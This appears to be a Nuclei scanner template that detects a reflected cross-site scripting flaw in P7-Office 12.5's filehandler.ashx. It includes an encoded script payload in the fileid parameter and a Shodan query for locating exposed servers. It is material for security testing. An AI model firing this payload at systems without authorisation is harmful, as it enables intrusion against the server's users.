id: p7-office-xss

info:
  name: Р7-Office 12.5 - Cross-Site Scripting
  author: 0xpugal
  severity: medium
  description: |
    The vulnerability of the P7-Office corporate server is related to the failure to take measures to protect the structure of the web page. Successful exploitation of the vulnerability could allow a remote attacker to carry out a cross-site scripting (XSS) attack.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://bdu.fstec.ru/vul/2024-04635
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Р7-Офис"
  tags: Р7-Офис,P7-office,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/Products/Files/HttpHandlers/filehandler.ashx?action=thumb&fileid=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Can not convert id: '
          - '<script>alert(document.domain)</script>'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 500
